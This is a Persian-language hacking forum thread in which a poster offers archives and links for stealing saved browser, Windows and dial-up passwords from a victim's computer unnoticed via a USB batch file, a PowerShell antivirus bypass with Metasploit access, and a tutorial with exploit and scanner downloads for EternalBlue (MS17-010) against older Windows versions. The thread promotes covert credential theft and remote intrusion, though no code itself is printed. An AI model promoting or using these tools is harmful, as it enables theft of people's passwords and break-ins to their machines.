13 ارسال در این موضوع قرار دارد

درود

 

تو این قسمت پسورد های ذخیره شده در مرورگر ها و سرویس های ویندوز و Dialup و ... رو از سیستم قربانی بدون اینکه متوجه بشه بیرون می کشیم. آنتی ویروس به هیچ وجه مشکلی ایجاد نمی کنه و همینطور دسترسی UAC هم نمی خواد . ^_^

 

نکته: با استفاده از این ابزار ها می تونید به راحتی با یک usb پسورد های ذخیره شده در سیستم مورد نظرتون رو کش برید. !  :wacko:

مثلآ می تونید فایل launch.bat رو با یه فایل دیگه بایند کنید و پسورد ها در usb شما در محلی که تعیین کردید ذخیره می شن.

 

Tools های استفاده شده پیوست شد.

 

پسورد : guardiran.org

حجم فشرده : 10mg

کیفیت: عالی

Pass_Steal.part1.rar

Pass_Steal.part2.rar

password_dumpers.rar

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

یک ابزار دیگه هم برای بیرون کشیدن پسورد های ذخیره شده در مرورگرها با استفاده از Command Line به نام BrowserPasswordDump پیوست شد.

 

اما یک نکته در مورد مطلب بالا بگم اونم اینه که همه ابزار هایی که برای بیرون کشیدن پسورد های ذخیره شده وجود دارند با فایرفاکس آپدیت شده مشکل دارند (البته برای بقیه مروگر ها و فایرفاکس آپدیت نشده کار می کنند). Nirsoft هم بعد از اینکه آپدیت برنامه PasswordFox رو داد دیگه قابلیت استفاده در Command Line رو در اون قرار نداده و بصورت گرافیکی فقط قابل استفاده هست که روی فایرفاکس های آپدیت کار میکنه اما نمیشه با CMD فایل Output رو گرفت و باید بصورت گرافیکی اجرا بشه و Save بشه.

هر چقدر هم به دنبال ابزار های دیگه ایی که این مشکل رو نداشته باشند, Search کردم , پیدا نکردم که با فایرفاکس آپدیت کار کنه و بشه با Command Line پسورد ها رو بیرون کشید تا بتونیم بصورت مخفی باهاش کار کنیم .

بنظرم ایده خوب و کارآمدی  هست برای برنامه نویسی اگر کسی از بچه های گارد ایران برنامه اش رو بنویسه .

 

PasswordFox v1.5 هم پیوست شد.

BrowserPasswordDump.rar

passwordfox-v1.5.zip

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

درود

 

تو این قسمت با Powershell آنتی ویروس رو بایپس می کنیم و با یک فایل Bat با متااسپلویت دسترسی می گیریم.

 

حجم فشرده : 13mg

کیفیت : خوب

نتوستم تو انجمن آپ کنم از مدیران کسی تونست زحمتش رو بکشه .

 

دانلود Download

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

درود به همه دوستان عزیزم

با تاخیر زیاد برگشتم.

خب برای اینکه یه شروع پر قدرت داشته باشیم با یک آموزش جدید و Priv8 اومدم !‌ B) 

می خوام تو این پست هک با باگ فوق العاده و جدیده eternalblue doubleplusar با اسم MS17-010 که پس از هک شدن NSA نشت پیدا کرد و باجگیر WannaCry یا WCrypt معروف هم از همین باگ که تو سرویس SMB هست , برای انتشار خودش استفاده می کنه رو آموزش بدم که باهاش به راحتی می تونید نسخه های 

   1   Windows XP (all services pack) (x86) (x64)
   2   Windows Server 2003 SP0 (x86)
   3   Windows Server 2003 SP1/SP2 (x86)
   4   Windows Server 2003 (x64)
   5   Windows Vista (x86)
   6   Windows Vista (x64)
   7   Windows Server 2008 (x86) 
   8   Windows Server 2008 R2 (x86) (x64)
   9   Windows 7 (all services pack) (x86) (x64)

رو بصورت Remote بزنید.

نکته : این باگ چون به تازگی اومده و بسیار خطرناک هست, هنوز تیم متااسپلویت, اکسپلویت اش رو داخل برنامه متااسپلویت قرار نداده و فقط ماژول اسکنر باگ رو در آپدیت خودش بیرون داده !

بقیه مطالب رو در آموزش تصویری و با صدا که توسط خودم ضبط شده ببینید.

 

کیفیت صدا و تصویر : خوب

حجم فشرده : ۳۰ مگابایت در ۴ پارت

پسورد : guardiran.org

 

لینک دانلود در پست بعد . . .

eternalblue_doubleplusar.part1.rar

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

پارت اول در پست قبل پیوست شد ولی ۳ پارت بعدی رو نتونستم تو انجمن پیوست کنم و همه رو در PicoFile پیوست کردم.

هرکدوم از مدیران اگه تونستن زحمتشو بکشن.

لینک دانلود پارت اول

لینک دانلود پارت دوم

لینک دانلود پارت سوم

لینک دانلود پارت چهارم

لینک اکسپلویت EternalBlue

لینک اسکنر EternalBlue

 

ولی واقعا این استقبال ارزش ضبط اولین آموزش تصویری و با صدای فارسی از این باگ جدید رو نداره ! -_-

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری